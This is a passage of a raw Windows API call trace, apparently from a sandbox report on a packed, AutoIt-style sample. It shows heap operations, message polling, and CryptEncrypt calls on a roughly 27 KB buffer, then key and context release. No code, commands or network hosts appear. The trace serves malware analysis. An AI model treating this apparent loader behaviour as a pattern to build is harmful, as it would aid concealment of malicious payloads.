(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.640] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da208, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da208*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0031.640] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.640] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.640] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.640] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.640] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.640] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.640] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.640] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.640] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0031.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.640] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.640] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.640] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.640] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.640] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.641] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.641] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.641] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.641] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.641] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.641] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.641] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.641] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.641] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.641] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x6c09, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x6c10) returned 1 [0031.641] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.641] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.642] CharLowerBuffW (in: lpsz="byte[27665]", cchLength=0xb | out: lpsz="byte[27665]") returned 0xb [0031.642] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.644] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.644] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.644] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.644] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x896bc8*, pdwDataLen=0x6ae220*=0x6c09, dwBufLen=0x6c10 | out: pbData=0x896bc8*, pdwDataLen=0x6ae220*=0x6c10) returned 1 [0031.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.646] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.646] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.646] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.646] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0031.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.646] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.646] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.646] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.646] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.646] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.646] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.647] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.647] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.647] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.647] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.649] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.650] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.650] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.652] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.652] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.652] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.652] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.652] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.652] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0031.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.652] CryptDestroyKey (hKey=0x7c2200) returned 1 [0031.653] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.653] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.653] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0031.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.653] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.653] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.653] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0031.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.653] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.653] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0031.653] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0031.653] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0031.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.653] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.653] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.653] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.653] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0031.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.654] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.654] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.654] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.654] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0031.654] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.654] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.654] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0031.654] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.654] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0031.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0031.654] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.654] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.654] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0031.654] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.654] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.654] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.655] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0031.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0031.655] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, 